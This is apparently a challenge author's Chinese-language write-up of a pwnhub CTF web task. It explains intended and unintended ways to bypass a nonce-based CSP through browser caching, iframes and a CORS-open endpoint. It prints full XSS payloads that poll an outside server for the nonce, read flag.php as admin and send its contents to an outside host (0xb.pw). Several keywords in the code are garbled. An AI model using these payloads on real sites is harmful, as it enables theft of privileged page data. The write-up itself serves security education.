wnhub 絕對防御 出題思路和反思。由于整個站最初的時(shí)候其實(shí)是用來測試漏洞的，所以被改成題目的時(shí)候很多應(yīng)該注意的地方?jīng)]有仔細(xì)推敲，在看了別人wp后仔細(xì)研究了一下，我發(fā)現(xiàn)題目本身漏洞就要求admin和xss點(diǎn)在同源下，整個漏洞被改成ctf題目是存在沖突的，再加上flag所在的地方使用了referer check本身就有問題，導(dǎo)致題目有了很多非預(yù)期解法，深感抱歉。

下面就完整的整理一下wp和所有的非預(yù)期攻擊方式

初逛站里面什么都沒有，聊天版的地方存在基本的xss，復(fù)寫就能繞過，但有 簡單的csp，允許unsafa-inline，session是httponly的，復(fù)寫構(gòu)造xss讀admin頁面的消息(讓admin去請求api)

獲取頁面內(nèi)容后，得到了后面站的地址，打開看看返回是這樣的

Wow, good guys,maybe you want /adminshigesha233e3333/#admin

再看看flag.php

hello, hacker, only admin can see it

只有管理員才能看，這里如果在user.php構(gòu)造xss去讀flag的內(nèi)容的話，會得到我的提示

nothing here,╮(╯-╰)╭,what ever you try, only from adminshigesha233e3333 can read it...

這里的提示本來意思是只有在admin目錄下才能讀到flag.php的內(nèi)容，但是沒想到有一些人，在這里去日了我的判斷，而不是構(gòu)造別的xss。

事實(shí)證明referer check不可取，切記切記

這位大佬就是攻擊了我的referer check，藍(lán)貓也是類似的方式

https://pwnhub.cn/media/writeup/121/79edbf2c-75da-48bb-8f5d-563d0048849b_b8b69656.pdf

下面我們回歸到正確的攻擊思路上去。

我們發(fā)現(xiàn)index.php是存在xss的樣子，但是后臺開啟了csp

這是一個比較特別的nonce script csp，屬于新型的csp，每次請求服務(wù)器都會更換新的字符串，如果字符串不匹配，那么腳本就會被攔截。(后面我會再發(fā)文章講這個CSP的攻擊方式)

我不知道盲測這個漏洞是怎么測試的，但你可能需要一篇文章

xss.html" data-ke-src="http://sirdarckcat.blogspot.jp/2016/12/how-to-bypass-csp-nonces-with-dom-xss.html" target="_blank">http://sirdarckcat.blogspot.jp/2016/12/how-to-bypass-csp-nonces-with-dom-xss.html

文章中提到了一點(diǎn)，如果瀏覽器并沒有請求后臺，那么csp就不會刷新，那么怎么才能讓它不刷新呢?瀏覽器緩存!

當(dāng)服務(wù)端做出一部分配置的之后，如果頁面內(nèi)容不涉及到后臺(僅涉及到前臺的變化)，那么瀏覽器就會從緩存中加載內(nèi)容。

具體瀏覽器緩存的機(jī)制就不多解釋了，我們發(fā)現(xiàn)后臺開啟了緩存機(jī)制，雖然只有30s，但是已然足夠了。

這里其實(shí)思路就呼之欲出了，先iframe請求一次，然后解出nonce的值，添加到script的屬性中，執(zhí)行任意xss。

由于沒有同源策略的攔截，所以出現(xiàn)了很多問題，類似于wupco的payload，但小m的和cola的是正解。

https://pwnhub.cn/media/writeup/123/909db9f9-1bb4-4c5b-a697-b0fa223ed376_a599515c.pdf

下面貼出，跨域情況下的處理方式以及payload，也是我出題的初衷。

根據(jù)前面文章中的poc，我們重新梳理試圖讀取flag.php的流程。

1、向admin發(fā)送payload，admin頁面需要打開一個iframe目標(biāo)為后臺并輸入一個form，用textrea吃掉頁面內(nèi)容

由于我們需要接收到這部分信息，而且后臺開啟csp，無法發(fā)送跨域請求，所以在自己服務(wù)器構(gòu)造nonce.php文件解析請求，返回nonce字符串。(nonce.php必須保證保存字符串，在之后的請求中返回，在原poc中，這里是通過session保留的，但是我在實(shí)際測試的時(shí)候遇到了問題，我改成了文件儲存)

2、我們需要不斷請求nonce.php，并點(diǎn)擊提交按鈕，當(dāng)返回有內(nèi)容的時(shí)候，開啟新的iframe標(biāo)簽，插入script標(biāo)簽，讀取flag.php，以跳轉(zhuǎn)的方式傳出。

functioonn getNoonnce() { var xhr = new XMLHttpRequest(); xhr.open("GET", "http://115.28.78.16/noonnce.php", false); xhr.send(); return xhr.respoonnseText; } setTimeout(pollNoonnce, 1000); functioonn pollNoonnce() { var noonnce = getNoonnce(); if (noonnce == "") { setTimeout(pollNoonnce, 1000); } else { attack(noonnce); } } functioonn attack(noonnce) { var iframe = document.createElement("iframe"); var url = "http://127.0.0.1/xsstest_new/admin/#" var payload = "var xmlhttp = new XMLHttpRequest(); xmlhttp.open(\"GET\", \"flag.php\", false); xmlhttp.send(); var mess = xmlhttp.respoonnse; var xhr = new XMLHttpRequest(); locatioonn.href=\"http://0xb.pw?\"+mess;"; var validPayload = "alert('If you see this alert, CSP is not active')" iframe.src = url + payload + validPayload; document.body.appendChild(iframe); } setTimeout("document.getElementById('frame').coonntentWindow.document.forms[0].submit();", 3000);

{C}

由于xhr需要跨域請求nonce.php，而前臺的站中含有csp，這是一個預(yù)設(shè)的坑，細(xì)心的人不難發(fā)現(xiàn)，用戶的信息是通過請求api/getmessage.php獲取的

我們可以注意這個頁面并沒有csp，所以構(gòu)造跳轉(zhuǎn)到getmessage.php，然后服務(wù)端設(shè)置 header("Access-Control-Allow-Origin:*"); ，成功繞過

全部payload如下

if(locatioonn.pathname != "/api/getmessage.php"){ window.locatioonn.href = "http://" + document.domain + "/api/getmessage.php" } functioonn getNoonnce() { var xhr = new XMLHttpRequest(); xhr.open("GET", "http://115.28.78.16/noonnce.php", false); xhr.send(); return xhr.respoonnseText; } setTimeout(pollNoonnce, 1000); functioonn pollNoonnce() { var noonnce = getNoonnce(); if (noonnce == "") { setTimeout(pollNoonnce, 1000); } else { attack(noonnce); } } functioonn attack(noonnce) { var iframe = document.createElement("iframe"); var url = "http://127.0.0.1/xsstest_new/adminshigesha233e3333/#" var payload = "var xmlhttp = new XMLHttpRequest(); xmlhttp.open(\"GET\", \"flag.php\", false); xmlhttp.send(); var mess = xmlhttp.respoonnse; var xhr = new XMLHttpRequest(); locatioonn.href=\"http://0xb.pw?\"+mess;"; var validPayload = "alert('If you see this alert, CSP is not active')" iframe.src = url + payload + validPayload; document.body.appendChild(iframe); } setTimeout("document.getElementById('frame').coonntentWindow.document.forms[0].submit();", 3000);

但事實(shí)上，題目有個非常有趣的非預(yù)期漏洞。

如果你注意觀察admin目錄的index.php頁面

xss點(diǎn)和script標(biāo)簽在同一行，所以就有了一個新的問題，如果我們構(gòu)造一個

<script>  標(biāo)簽，然后沒有閉合，就可以吃掉后面的標(biāo)簽，把后面script標(biāo)簽的屬性保留

最后貼下virink的wp

https://pwnhub.cn/media/writeup/119/45db4b4d-53dc-47de-afe8-e821bd070dfa_7032e508.pdf

這次的非預(yù)期問題實(shí)在抱歉，下次出題一定仔細(xì)思考下漏洞的流程和問題，還是太菜了Orz

</script>